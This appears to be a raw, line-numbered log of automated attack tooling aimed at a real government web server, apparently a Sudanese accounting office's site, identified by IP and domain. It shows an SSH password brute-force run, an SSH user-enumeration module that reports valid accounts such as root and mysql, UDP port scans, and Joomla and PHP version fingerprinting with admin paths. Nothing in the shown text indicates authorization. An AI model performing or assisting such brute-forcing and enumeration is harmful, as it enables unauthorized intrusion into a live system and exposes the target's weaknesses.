  1670. NSE: [ssh-brute] Trying username/password pair: test:abc123
  1671. NSE: [ssh-brute] Trying username/password pair: root:nicole
  1672. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  1673. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  1674. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  1675. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  1676. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  1677. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  1678. NSE: [ssh-brute] Trying username/password pair: user:nicole
  1679. NSE: [ssh-brute] Trying username/password pair: web:nicole
  1680. NSE: [ssh-brute] Trying username/password pair: test:nicole
  1681. NSE: [ssh-brute] Trying username/password pair: root:daniel
  1682. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  1683. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  1684. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  1685. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  1686. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  1687. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  1688. NSE: [ssh-brute] Trying username/password pair: user:daniel
  1689. NSE: [ssh-brute] Trying username/password pair: web:daniel
  1690. NSE: [ssh-brute] Trying username/password pair: test:daniel
  1691. NSE: [ssh-brute] Trying username/password pair: root:monkey
  1692. NSE: [ssh-brute] Trying username/password pair: admin:monkey
  1693. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
  1694. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
  1695. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
  1696. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
  1697. NSE: [ssh-brute] Trying username/password pair: guest:monkey
  1698. NSE: [ssh-brute] Trying username/password pair: user:monkey
  1699. NSE: [ssh-brute] Trying username/password pair: web:monkey
  1700. NSE: [ssh-brute] Trying username/password pair: test:monkey
  1701. NSE: [ssh-brute] Trying username/password pair: root:babygirl
  1702. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
  1703. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
  1704. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
  1705. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
  1706. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
  1707. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
  1708. NSE: [ssh-brute] Trying username/password pair: user:babygirl
  1709. NSE: [ssh-brute] Trying username/password pair: web:babygirl
  1710. NSE: [ssh-brute] Trying username/password pair: test:babygirl
  1711. NSE: [ssh-brute] Trying username/password pair: root:qwerty
  1712. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
  1713. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
  1714. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
  1715. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
  1716. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
  1717. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
  1718. NSE: [ssh-brute] Trying username/password pair: user:qwerty
  1719. NSE: [ssh-brute] Trying username/password pair: web:qwerty
  1720. NSE: [ssh-brute] Trying username/password pair: test:qwerty
  1721. NSE: [ssh-brute] Trying username/password pair: root:lovely
  1722. NSE: [ssh-brute] Trying username/password pair: admin:lovely
  1723. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
  1724. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
  1725. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
  1726. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
  1727. NSE: [ssh-brute] Trying username/password pair: guest:lovely
  1728. NSE: [ssh-brute] Trying username/password pair: user:lovely
  1729. NSE: [ssh-brute] Trying username/password pair: web:lovely
  1730. NSE: [ssh-brute] Trying username/password pair: test:lovely
  1731. NSE: [ssh-brute] Trying username/password pair: root:654321
  1732. NSE: [ssh-brute] Trying username/password pair: admin:654321
  1733. NSE: [ssh-brute] Trying username/password pair: administrator:654321
  1734. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
  1735. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
  1736. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
  1737. NSE: [ssh-brute] Trying username/password pair: guest:654321
  1738. NSE: [ssh-brute] Trying username/password pair: user:654321
  1739. NSE: [ssh-brute] Trying username/password pair: web:654321
  1740. NSE: [ssh-brute] Trying username/password pair: test:654321
  1741. NSE: [ssh-brute] Trying username/password pair: root:michael
  1742. NSE: [ssh-brute] Trying username/password pair: admin:michael
  1743. NSE: [ssh-brute] Trying username/password pair: administrator:michael
  1744. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
  1745. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
  1746. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
  1747. NSE: [ssh-brute] Trying username/password pair: guest:michael
  1748. NSE: [ssh-brute] Trying username/password pair: user:michael
  1749. NSE: [ssh-brute] Trying username/password pair: web:michael
  1750. NSE: [ssh-brute] Trying username/password pair: test:michael
  1751. NSE: [ssh-brute] Trying username/password pair: root:jessica
  1752. NSE: [ssh-brute] Trying username/password pair: admin:jessica
  1753. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
  1754. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
  1755. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
  1756. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
  1757. NSE: [ssh-brute] Trying username/password pair: guest:jessica
  1758. NSE: [ssh-brute] Trying username/password pair: user:jessica
  1759. NSE: [ssh-brute] Trying username/password pair: web:jessica
  1760. NSE: [ssh-brute] Trying username/password pair: test:jessica
  1761. NSE: [ssh-brute] Trying username/password pair: root:111111
  1762. NSE: [ssh-brute] Trying username/password pair: admin:111111
  1763. NSE: [ssh-brute] Trying username/password pair: administrator:111111
  1764. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
  1765. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
  1766. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
  1767. NSE: [ssh-brute] Trying username/password pair: guest:111111
  1768. NSE: [ssh-brute] Trying username/password pair: user:111111
  1769. NSE: [ssh-brute] Trying username/password pair: web:111111
  1770. NSE: [ssh-brute] Trying username/password pair: test:111111
  1771. NSE: [ssh-brute] Trying username/password pair: root:ashley
  1772. NSE: [ssh-brute] Trying username/password pair: admin:ashley
  1773. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
  1774. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
  1775. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
  1776. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
  1777. NSE: [ssh-brute] Trying username/password pair: guest:ashley
  1778. NSE: [ssh-brute] Trying username/password pair: user:ashley
  1779. NSE: [ssh-brute] Trying username/password pair: web:ashley
  1780. NSE: [ssh-brute] Trying username/password pair: test:ashley
  1781. NSE: [ssh-brute] Trying username/password pair: root:000000
  1782. NSE: [ssh-brute] Trying username/password pair: admin:000000
  1783. NSE: [ssh-brute] Trying username/password pair: administrator:000000
  1784. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
  1785. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
  1786. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
  1787. NSE: [ssh-brute] Trying username/password pair: guest:000000
  1788. NSE: [ssh-brute] Trying username/password pair: user:000000
  1789. NSE: [ssh-brute] Trying username/password pair: web:000000
  1790. NSE: [ssh-brute] Trying username/password pair: test:000000
  1791. NSE: [ssh-brute] Trying username/password pair: root:iloveu
  1792. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
  1793. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
  1794. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
  1795. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
  1796. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
  1797. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
  1798. NSE: [ssh-brute] Trying username/password pair: user:iloveu
  1799. NSE: [ssh-brute] Trying username/password pair: web:iloveu
  1800. NSE: [ssh-brute] Trying username/password pair: test:iloveu
  1801. NSE: [ssh-brute] Trying username/password pair: root:michelle
  1802. NSE: [ssh-brute] Trying username/password pair: admin:michelle
  1803. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
  1804. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
  1805. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
  1806. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
  1807. NSE: [ssh-brute] Trying username/password pair: guest:michelle
  1808. NSE: [ssh-brute] Trying username/password pair: user:michelle
  1809. NSE: [ssh-brute] Trying username/password pair: web:michelle
  1810. NSE: [ssh-brute] Trying username/password pair: test:michelle
  1811. NSE: [ssh-brute] Trying username/password pair: root:tigger
  1812. NSE: [ssh-brute] Trying username/password pair: admin:tigger
  1813. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
  1814. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
  1815. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
  1816. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
  1817. NSE: [ssh-brute] Trying username/password pair: guest:tigger
  1818. NSE: [ssh-brute] Trying username/password pair: user:tigger
  1819. NSE: [ssh-brute] Trying username/password pair: web:tigger
  1820. NSE: [ssh-brute] Trying username/password pair: test:tigger
  1821. NSE: [ssh-brute] Trying username/password pair: root:sunshine
  1822. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
  1823. Nmap scan report for 62.12.101.14
  1824. Host is up (0.29s latency).
  1825.  
  1826. PORT STATE SERVICE VERSION
  1827. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  1828. | ssh-auth-methods:
  1829. | Supported authentication methods:
  1830. | publickey
  1831. | gssapi-keyex
  1832. | gssapi-with-mic
  1833. |_ password
  1834. | ssh-brute:
  1835. | Accounts: No valid accounts found
  1836. |_ Statistics: Performed 262 guesses in 182 seconds, average tps: 1.4
  1837. | ssh-hostkey:
  1838. | 1024 e4:f9:da:cf:9a:e4:fa:b9:38:74:3e:88:f4:41:3c:e7 (DSA)
  1839. |_ 2048 8c:0d:43:e9:5f:4c:24:ac:a2:b5:84:66:ae:7e:12:6a (RSA)
  1840. | ssh-publickey-acceptance:
  1841. |_ Accepted Public Keys: No public keys accepted
  1842. |_ssh-run: Failed to specify credentials and command to run.
  1843. Too many fingerprints match this host to give specific OS details
  1844. Network Distance: 16 hops
  1845.  
  1846. TRACEROUTE (using port 22/tcp)
  1847. HOP RTT ADDRESS
  1848. 1 64.45 ms 10.237.200.1
  1849. 2 64.89 ms 193.37.252.209
  1850. 3 64.85 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
  1851. 4 65.27 ms mai-b1-link.telia.net (213.248.68.36)
  1852. 5 90.65 ms ash-bb4-link.telia.net (62.115.120.176)
  1853. 6 190.06 ms prs-bb3-link.telia.net (62.115.112.243)
  1854. 7 188.25 ms mei-b2-link.telia.net (62.115.133.177)
  1855. 8 184.76 ms flagtelecom-ic-324599-mei-b2.c.telia.net (213.248.72.190)
  1856. 9 351.58 ms ae0.0.cjr01.mrs002.flagtel.com (62.216.131.145)
  1857. 10 198.74 ms flagtelecom-ic-324599-mei-b2.c.telia.net (213.248.72.190)
  1858. 11 354.49 ms xe-0-0-1.0.pjr04.dxb001.flagtel.com (85.95.25.94)
  1859. 12 355.96 ms xe-11-1-1.0.pjr04.dxb001.flagtel.com (85.95.25.162)
  1860. 13 320.81 ms 196.29.177.113
  1861. 14 315.82 ms 197.254.196.62
  1862. 15 ...
  1863. 16 330.41 ms 62.12.101.14
  1864. #######################################################################################################################################
  1865. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  1866. RHOSTS => 62.12.101.14
  1867. RHOST => 62.12.101.14
  1868. [*] 62.12.101.14:22 - SSH - Using malformed packet technique
  1869. [*] 62.12.101.14:22 - SSH - Starting scan
  1870. [-] 62.12.101.14:22 - SSH - User 'admin' not found
  1871. [-] 62.12.101.14:22 - SSH - User 'administrator' not found
  1872. [-] 62.12.101.14:22 - SSH - User 'anonymous' not found
  1873. [-] 62.12.101.14:22 - SSH - User 'backup' not found
  1874. [-] 62.12.101.14:22 - SSH - User 'bee' not found
  1875. [+] 62.12.101.14:22 - SSH - User 'ftp' found
  1876. [-] 62.12.101.14:22 - SSH - User 'guest' not found
  1877. [-] 62.12.101.14:22 - SSH - User 'GUEST' not found
  1878. [-] 62.12.101.14:22 - SSH - User 'info' not found
  1879. [+] 62.12.101.14:22 - SSH - User 'mail' found
  1880. [-] 62.12.101.14:22 - SSH - User 'mailadmin' not found
  1881. [-] 62.12.101.14:22 - SSH - User 'msfadmin' not found
  1882. [+] 62.12.101.14:22 - SSH - User 'mysql' found
  1883. [+] 62.12.101.14:22 - SSH - User 'nobody' found
  1884. [-] 62.12.101.14:22 - SSH - User 'oracle' not found
  1885. [-] 62.12.101.14:22 - SSH - User 'owaspbwa' not found
  1886. [+] 62.12.101.14:22 - SSH - User 'postfix' found
  1887. [-] 62.12.101.14:22 - SSH - User 'postgres' not found
  1888. [-] 62.12.101.14:22 - SSH - User 'private' not found
  1889. [-] 62.12.101.14:22 - SSH - User 'proftpd' not found
  1890. [-] 62.12.101.14:22 - SSH - User 'public' not found
  1891. [+] 62.12.101.14:22 - SSH - User 'root' found
  1892. [-] 62.12.101.14:22 - SSH - User 'superadmin' not found
  1893. [-] 62.12.101.14:22 - SSH - User 'support' not found
  1894. [-] 62.12.101.14:22 - SSH - User 'sys' not found
  1895. [-] 62.12.101.14:22 - SSH - User 'system' not found
  1896. [-] 62.12.101.14:22 - SSH - User 'systemadmin' not found
  1897. [-] 62.12.101.14:22 - SSH - User 'systemadministrator' not found
  1898. [-] 62.12.101.14:22 - SSH - User 'test' not found
  1899. [+] 62.12.101.14:22 - SSH - User 'tomcat' found
  1900. [-] 62.12.101.14:22 - SSH - User 'user' not found
  1901. [-] 62.12.101.14:22 - SSH - User 'webmaster' not found
  1902. [-] 62.12.101.14:22 - SSH - User 'www-data' not found
  1903. [-] 62.12.101.14:22 - SSH - User 'Fortimanager_Access' not found
  1904. [*] Scanned 1 of 1 hosts (100% complete)
  1905. [*] Auxiliary module execution completed
  1906. #######################################################################################################################################
  1907. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:15 EST
  1908. Nmap scan report for 62.12.101.14
  1909. Host is up.
  1910.  
  1911. PORT STATE SERVICE VERSION
  1912. 67/udp open|filtered dhcps
  1913. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  1914. Too many fingerprints match this host to give specific OS details
  1915.  
  1916. TRACEROUTE (using proto 1/icmp)
  1917. HOP RTT ADDRESS
  1918. 1 65.29 ms 10.237.200.1
  1919. 2 65.74 ms 193.37.252.209
  1920. 3 65.69 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
  1921. 4 66.13 ms mai-b1-link.telia.net (213.248.68.36)
  1922. 5 92.12 ms 62.115.119.230
  1923. 6 185.78 ms prs-bb3-link.telia.net (80.91.251.242)
  1924. 7 185.77 ms mei-b2-link.telia.net (62.115.133.175)
  1925. 8 191.96 ms flagtelecom-ic-324599-mei-b2.c.telia.net (213.248.72.190)
  1926. 9 351.46 ms ae1.0.cjr01.mrs002.flagtel.com (62.216.131.149)
  1927. 10 207.82 ms ae3.0.cjr02.prs001.flagtel.com (62.216.128.209)
  1928. 11 360.99 ms xe-11-1-1.0.pjr04.dxb001.flagtel.com (85.95.25.162)
  1929. 12 322.93 ms 80.77.2.42
  1930. 13 330.29 ms 196.29.177.113
  1931. 14 325.52 ms 197.254.196.62
  1932. 15 ... 30
  1933. ######################################################################################################################################
  1934. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:17 EST
  1935. Nmap scan report for 62.12.101.14
  1936. Host is up.
  1937.  
  1938. PORT STATE SERVICE VERSION
  1939. 68/udp open|filtered dhcpc
  1940. Too many fingerprints match this host to give specific OS details
  1941.  
  1942. TRACEROUTE (using proto 1/icmp)
  1943. HOP RTT ADDRESS
  1944. 1 65.30 ms 10.237.200.1
  1945. 2 66.95 ms 193.37.252.209
  1946. 3 66.93 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
  1947. 4 67.07 ms mai-b1-link.telia.net (213.248.68.36)
  1948. 5 97.56 ms 62.115.119.230
  1949. 6 186.32 ms prs-bb3-link.telia.net (80.91.251.242)
  1950. 7 186.35 ms mei-b2-link.telia.net (62.115.133.175)
  1951. 8 192.38 ms flagtelecom-ic-324599-mei-b2.c.telia.net (213.248.72.190)
  1952. 9 352.12 ms ae1.0.cjr01.mrs002.flagtel.com (62.216.131.149)
  1953. 10 208.12 ms ae3.0.cjr02.prs001.flagtel.com (62.216.128.209)
  1954. 11 351.54 ms xe-11-1-1.0.pjr04.dxb001.flagtel.com (85.95.25.162)
  1955. 12 313.56 ms 80.77.2.42
  1956. 13 320.69 ms 196.29.177.113
  1957. 14 316.68 ms 197.254.196.62
  1958. 15 ... 30
  1959. #######################################################################################################################################
  1960. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:19 EST
  1961. Nmap scan report for 62.12.101.14
  1962. Host is up.
  1963.  
  1964. PORT STATE SERVICE VERSION
  1965. 69/udp open|filtered tftp
  1966. Too many fingerprints match this host to give specific OS details
  1967.  
  1968. TRACEROUTE (using proto 1/icmp)
  1969. HOP RTT ADDRESS
  1970. 1 65.35 ms 10.237.200.1
  1971. 2 65.74 ms 193.37.252.209
  1972. 3 108.80 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
  1973. 4 66.18 ms mai-b1-link.telia.net (213.248.68.36)
  1974. 5 92.16 ms 62.115.119.230
  1975. 6 186.49 ms prs-bb3-link.telia.net (80.91.251.242)
  1976. 7 186.47 ms mei-b2-link.telia.net (62.115.133.175)
  1977. 8 193.19 ms flagtelecom-ic-324599-mei-b2.c.telia.net (213.248.72.190)
  1978. 9 351.63 ms ae1.0.cjr01.mrs002.flagtel.com (62.216.131.149)
  1979. 10 206.78 ms ae3.0.cjr02.prs001.flagtel.com (62.216.128.209)
  1980. 11 351.07 ms xe-11-1-1.0.pjr04.dxb001.flagtel.com (85.95.25.162)
  1981. 12 313.08 ms 80.77.2.42
  1982. 13 321.46 ms 196.29.177.113
  1983. 14 314.86 ms 197.254.196.62
  1984. 15 ... 30
  1985. #######################################################################################################################################
  1986. http://62.12.101.14 [200 OK] Apache[2.2,2.2.15], Cookies[38fe2784091f2c2f81131c445ff0bfb3], HTML5, HTTPServer[CentOS][Apache/2.2.15 (CentOS)], HttpOnly[38fe2784091f2c2f81131c445ff0bfb3], IP[62.12.101.14], JQuery, maybe Joomla, Meta-Author[Super User], MetaGenerator[Joomla! - Open Source Content Management], OpenSearch[http://62.12.101.14/index.php/component/search/?id=86&amp;Itemid=470&amp;format=opensearch], PHP[5.6.18], Script[text/javascript], Title[الرئيسية - ديوان الحسابات], UncommonHeaders[x-logged-in], X-Powered-By[PHP/5.6.18]
  1987. #######################################################################################################################################
  1988. wig - WebApp Information Gatherer
  1989.  
  1990.  
  1991. Scanning http://62.12.101.14...
  1992. ___________________________________________ SITE INFO ___________________________________________
  1993. IP Title
  1994. 62.12.101.14 الرئيسية - ديوان الحسابات
  1995.  
  1996. ____________________________________________ VERSION ____________________________________________
  1997. Name Versions Type
  1998. Joomla! 3.4.4 | 3.4.4-rc | 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 CMS
  1999. 3.4.8-rc
  2000. Apache 2.2.15 Platform
  2001. PHP 5.6.18 Platform
  2002. CentOS 6.6 | 6.8 OS
  2003.  
  2004. __________________________________________ INTERESTING __________________________________________
  2005. URL Note Type
  2006. /robots.txt robots.txt index Interesting
  2007.  
  2008. _____________________________________________ TOOLS _____________________________________________
  2009. Name Link Software
  2010. CMSmap https://github.com/Dionach/CMSmap Joomla!
  2011. joomscan http://sourceforge.net/projects/joomscan/ Joomla!
  2012.  
  2013. _________________________________________________________________________________________________
  2014. Time: 86.1 sec Urls: 845 Fingerprints: 40401
  2015. #######################################################################################################################################
  2016. HTTP/1.1 200 OK
  2017. Date: Tue, 12 Feb 2019 02:24:23 GMT
  2018. Server: Apache/2.2.15 (CentOS)
  2019. X-Powered-By: PHP/5.6.18
  2020. Set-Cookie: 38fe2784091f2c2f81131c445ff0bfb3=vidnijf644bi2rvokl4s4e55p7; path=/; HttpOnly
  2021. X-Logged-In: False
  2022. P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  2023. Expires: Mon, 1 Jan 2001 00:00:00 GMT
  2024. Last-Modified: Tue, 12 Feb 2019 02:24:24 GMT
  2025. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  2026. Pragma: no-cache
  2027. Connection: close
  2028. Content-Type: text/html; charset=utf-8
  2029.  
  2030. HTTP/1.1 200 OK
  2031. Date: Tue, 12 Feb 2019 02:24:25 GMT
  2032. Server: Apache/2.2.15 (CentOS)
  2033. X-Powered-By: PHP/5.6.18
  2034. Set-Cookie: 38fe2784091f2c2f81131c445ff0bfb3=nlqf082l45vm0ulr90manomoj0; path=/; HttpOnly
  2035. X-Logged-In: False
  2036. P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  2037. Expires: Mon, 1 Jan 2001 00:00:00 GMT
  2038. Last-Modified: Tue, 12 Feb 2019 02:24:25 GMT
  2039. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  2040. Pragma: no-cache
  2041. Connection: close
  2042. Content-Type: text/html; charset=utf-8
  2043. #######################################################################################################################################
  2044. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:24 EST
  2045. Nmap scan report for 62.12.101.14
  2046. Host is up.
  2047.  
  2048. PORT STATE SERVICE VERSION
  2049. 123/udp open|filtered ntp
  2050. Too many fingerprints match this host to give specific OS details
  2051.  
  2052. TRACEROUTE (using proto 1/icmp)
  2053. HOP RTT ADDRESS
  2054. 1 65.64 ms 10.237.200.1
  2055. 2 65.70 ms 193.37.252.209
  2056. 3 65.69 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
  2057. 4 66.42 ms mai-b1-link.telia.net (213.248.68.36)
  2058. 5 92.50 ms 62.115.119.230
  2059. 6 186.86 ms prs-bb3-link.telia.net (80.91.251.242)
  2060. 7 186.89 ms mei-b2-link.telia.net (62.115.133.175)
  2061. 8 192.43 ms flagtelecom-ic-324599-mei-b2.c.telia.net (213.248.72.190)
  2062. 9 351.81 ms ae1.0.cjr01.mrs002.flagtel.com (62.216.131.149)
  2063. 10 208.95 ms ae3.0.cjr02.prs001.flagtel.com (62.216.128.209)
  2064. 11 350.69 ms xe-11-1-1.0.pjr04.dxb001.flagtel.com (85.95.25.162)
  2065. 12 312.44 ms 80.77.2.42
  2066. 13 320.49 ms 196.29.177.113
  2067. 14 315.43 ms 197.254.196.62
  2068. 15 ... 30
  2069. #######################################################################################################################################
  2070. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:32 EST
  2071. NSE: Loaded 148 scripts for scanning.
  2072. NSE: Script Pre-scanning.
  2073. NSE: Starting runlevel 1 (of 2) scan.
  2074. Initiating NSE at 21:32
  2075. Completed NSE at 21:32, 0.00s elapsed
  2076. NSE: Starting runlevel 2 (of 2) scan.
  2077. Initiating NSE at 21:32
  2078. Completed NSE at 21:32, 0.00s elapsed
  2079. Initiating Ping Scan at 21:32
  2080. Scanning 62.12.101.14 [4 ports]
  2081. Completed Ping Scan at 21:32, 2.04s elapsed (1 total hosts)
  2082. Nmap scan report for 62.12.101.14 [host down, received no-response]
  2083. NSE: Script Post-scanning.
  2084. NSE: Starting runlevel 1 (of 2) scan.
  2085. Initiating NSE at 21:32
  2086. Completed NSE at 21:32, 0.00s elapsed
  2087. NSE: Starting runlevel 2 (of 2) scan.
  2088. Initiating NSE at 21:32
  2089. Completed NSE at 21:32, 0.00s elapsed
  2090. Read data files from: /usr/bin/../share/nmap
  2091. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  2092. Nmap done: 1 IP address (0 hosts up) scanned in 2.57 seconds
  2093. Raw packets sent: 8 (304B) | Rcvd: 379 (58.742KB)
  2094. #######################################################################################################################################
  2095. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:32 EST
  2096. NSE: Loaded 148 scripts for scanning.
  2097. NSE: Script Pre-scanning.
  2098. Initiating NSE at 21:32
  2099. Completed NSE at 21:32, 0.00s elapsed
  2100. Initiating NSE at 21:32
  2101. Completed NSE at 21:32, 0.00s elapsed
  2102. Initiating Parallel DNS resolution of 1 host. at 21:32
  2103. Completed Parallel DNS resolution of 1 host. at 21:32, 0.02s elapsed
  2104. Initiating UDP Scan at 21:32
  2105. Scanning 62.12.101.14 [14 ports]
  2106. Completed UDP Scan at 21:32, 2.13s elapsed (14 total ports)
  2107. Initiating Service scan at 21:32
  2108. Scanning 12 services on 62.12.101.14
  2109. Service scan Timing: About 8.33% done; ETC: 21:51 (0:17:58 remaining)
  2110. Completed Service scan at 21:34, 102.57s elapsed (12 services on 1 host)
  2111. Initiating OS detection (try #1) against 62.12.101.14
  2112. Retrying OS detection (try #2) against 62.12.101.14
  2113. Initiating Traceroute at 21:34
  2114. Completed Traceroute at 21:34, 7.21s elapsed
  2115. Initiating Parallel DNS resolution of 1 host. at 21:34
  2116. Completed Parallel DNS resolution of 1 host. at 21:34, 0.02s elapsed
  2117. NSE: Script scanning 62.12.101.14.
  2118. Initiating NSE at 21:34
  2119. Completed NSE at 21:34, 20.31s elapsed
  2120. Initiating NSE at 21:34
  2121. Completed NSE at 21:34, 1.03s elapsed
  2122. Nmap scan report for 62.12.101.14
  2123. Host is up (0.065s latency).
  2124.  
  2125. PORT STATE SERVICE VERSION
  2126. 53/udp open|filtered domain
  2127. 67/udp open|filtered dhcps
  2128. 68/udp open|filtered dhcpc
  2129. 69/udp open|filtered tftp
  2130. 88/udp open|filtered kerberos-sec
  2131. 123/udp open|filtered ntp
  2132. 137/udp filtered netbios-ns
  2133. 138/udp filtered netbios-dgm
  2134. 139/udp open|filtered netbios-ssn
  2135. 161/udp open|filtered snmp
  2136. 162/udp open|filtered snmptrap
  2137. 389/udp open|filtered ldap
  2138. 520/udp open|filtered route
  2139. 2049/udp open|filtered nfs
  2140. Too many fingerprints match this host to give specific OS details
  2141.  
  2142. TRACEROUTE (using port 137/udp)
  2143. HOP RTT ADDRESS
  2144. 1 63.94 ms 10.237.200.1
  2145. 2 ... 3
  2146. 4 65.05 ms 10.237.200.1
  2147. 5 69.21 ms 10.237.200.1
  2148. 6 69.20 ms 10.237.200.1
  2149. 7 69.19 ms 10.237.200.1
  2150. 8 69.19 ms 10.237.200.1
  2151. 9 69.18 ms 10.237.200.1
  2152. 10 69.18 ms 10.237.200.1
  2153. 11 ... 18
  2154. 19 64.20 ms 10.237.200.1
  2155. 20 65.36 ms 10.237.200.1
  2156. 21 ... 27
  2157. 28 64.83 ms 10.237.200.1
  2158. 29 67.37 ms 10.237.200.1
  2159. 30 63.43 ms 10.237.200.1
  2160.  
  2161. NSE: Script Post-scanning.
  2162. Initiating NSE at 21:34
  2163. Completed NSE at 21:34, 0.00s elapsed
  2164. Initiating NSE at 21:34
  2165. Completed NSE at 21:34, 0.00s elapsed
  2166. Read data files from: /usr/bin/../share/nmap
  2167. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2168. Nmap done: 1 IP address (1 host up) scanned in 137.05 seconds
  2169. Raw packets sent: 148 (13.692KB) | Rcvd: 3638 (1.044MB)
  2170. #######################################################################################################################################
  2171. [+] FireWall Detector
  2172. [++] Firewall not detected
  2173.  
  2174. [+] Detecting Joomla Version
  2175. [++] Joomla 3.4.8
  2176.  
  2177. [+] Core Joomla Vulnerability
  2178. [++] Target Joomla core is not vulnerable
  2179.  
  2180. [+] Checking apache info/status files
  2181. [++] Readable info/status files are not found
  2182.  
  2183. [+] admin finder
  2184. [++] Admin page : http://accounting.gov.sd/administrator/
  2185.  
  2186. [+] Checking robots.txt existing
  2187. [++] robots.txt is found
  2188. path : http://accounting.gov.sd/robots.txt
  2189.  
  2190. Interesting path found from robots.txt
  2191. http://accounting.gov.sd/joomla/administrator/
  2192. http://accounting.gov.sd/administrator/
  2193. http://accounting.gov.sd/cache/
  2194. http://accounting.gov.sd/cli/
  2195. http://accounting.gov.sd/components/
  2196. http://accounting.gov.sd/images/
  2197. http://accounting.gov.sd/includes/
  2198. http://accounting.gov.sd/installation/
  2199. http://accounting.gov.sd/language/
  2200. http://accounting.gov.sd/libraries/
  2201. http://accounting.gov.sd/logs/
  2202. http://accounting.gov.sd/media/
  2203. http://accounting.gov.sd/modules/
  2204. http://accounting.gov.sd/plugins/
  2205. http://accounting.gov.sd/templates/
  2206. http://accounting.gov.sd/tmp/
  2207.  
  2208.  
  2209. [+] Finding common backup files name
  2210. [++] Backup files are not found
  2211.  
  2212. [+] Finding common log files name
  2213. [++] error log is not found
  2214.  
  2215. [+] Checking user registration
  2216. [++] registration is enabled
  2217. http://accounting.gov.sd/index.php?option=com_users&view=registration
  2218.  
  2219. [+] Checking sensitive config.php.x file
  2220. [++] Readable config files are not found
  2221. #######################################################################################################################################
  2222. [-] Date & Time: 11/02/2019 19:39:54
  2223. [I] Threads: 5
  2224. [-] Target: http://accounting.gov.sd (62.12.101.14)
